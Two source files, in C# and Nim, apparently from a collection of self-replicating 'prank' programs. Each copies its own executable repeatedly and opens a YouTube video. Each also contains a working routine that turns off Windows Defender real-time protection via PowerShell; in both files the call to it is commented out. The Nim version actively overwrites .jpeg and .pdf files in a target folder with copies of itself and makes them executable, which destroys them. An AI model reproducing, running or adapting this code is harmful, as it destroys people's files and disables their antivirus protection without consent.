File: C#/replicate.cs
using System;
using System.IO;
using System.Reflection;
using System.Diagnostics;

namespace SelfReplicatingCode
{
    class replicate
    {
        private const int MAX_ITERATIONS = 20;

        static void Main(string[] args)
        {
            string fileName = Assembly.GetExecutingAssembly().Location;
            string directoryPath = Path.Combine(Path.GetDirectoryName(fileName), "generated-files");

            // create the directory if it doesn't exist
            if (!Directory.Exists(directoryPath))
            {
                Directory.CreateDirectory(directoryPath);
            }

            for (int i = 0; i < MAX_ITERATIONS; i++)
            {
                string newFileName = Path.Combine(directoryPath,
                    Path.GetFileNameWithoutExtension(fileName) + i + Path.GetExtension(fileName));
                File.Copy(fileName, newFileName, true);
            }

            // DisableWindowsDefender(); // Disable Windows Defender

            // Alger(); // Insert in loop if you want to say alger everytime you replicate (spam)

            PlayRickRoll(); // Insert in loop if you want to rickroll everytime you replicate (spam)
        }

        static void DisableWindowsDefender()
        {
            string command = "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true";

            ProcessStartInfo processInfo = new ProcessStartInfo("cmd.exe", "/c " + command);
            processInfo.RedirectStandardError = true;
            processInfo.RedirectStandardOutput = true;
            processInfo.CreateNoWindow = true;
            processInfo.UseShellExecute = false;

            Process process = new Process();
            process.StartInfo = processInfo;
            process.Start();

            // read the output of the command
            string output = process.StandardOutput.ReadToEnd();
            string error = process.StandardError.ReadToEnd();

            Console.WriteLine("Output: " + output);
            Console.WriteLine("Error: " + error);
        }

        static void Alger()
        {
            string command = "echo 'alger'";

            ProcessStartInfo processInfo = new ProcessStartInfo("/bin/bash", "-c \"" + command + "\"");
            processInfo.RedirectStandardError = true;
            processInfo.RedirectStandardOutput = true;
            processInfo.CreateNoWindow = true;
            processInfo.UseShellExecute = false;

            Process process = new Process();
            process.StartInfo = processInfo;
            process.Start();

            // read the output of the command
            string output = process.StandardOutput.ReadToEnd();
            string error = process.StandardError.ReadToEnd();

            Console.WriteLine("Output: " + output);
            Console.WriteLine("Error: " + error);
        }

        static void PlayRickRoll()
        {
            string url = "https://www.youtube.com/watch?v=dQw4w9WgXcQ";

            // Launch the default web browser to play the video
            System.Diagnostics.Process.Start(url);
        }
    }
}

File: Nim/replicate.nim
import std/os
import std/browsers
import osproc

proc Rasputin() =
    let url = "https://www.youtube.com/watch?v=16y1AkoZkmQ"
    openDefaultBrowser(url)


proc disableWindowsDefender() =
    var command = "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"

    discard execProcess(command, options={ProcessOption.poEvalCommand, ProcessOption.poDaemon})

proc targetExtensions(filename: string, directory: string, extensions: seq[string]) =
    for extension in extensions:
        for file in walkDir(directory):
            var ext = splitFile(file.path)[2]
            if ext == extension:
                copyFileWithPermissions(filename, file.path)
                var command = "chmod +x " & file.path
                discard execProcess(command, options={ProcessOption.poEvalCommand})
            

proc main() =

    let filename = getAppFilename()
    let directory = getAppDir()
    var extensionsToTarget: seq[string] = @[".jpeg", ".pdf"]
    const MAX_ITERATIONS = 20


    # create a directory for generated files
    let generatedDir = directory & "/generated-files"

    discard existsOrCreateDir(generatedDir)

    for i in 1..MAX_ITERATIONS:
        var newfile = filename & $i
        copyFile(filename, newfile)
        copyFileToDir(newfile, generatedDir)
        discard execProcess("chmod +x ./generated-files/*", options={ProcessOption.poEvalCommand})
        removeFile(newfile)

    Rasputin() # RA RA RASPUTIN
    # disableWindowsDefender() # THIS ACTUALLY WORKS, BE CAREFUL
    targetExtensions(filename,"./target", extensionsToTarget)


main()
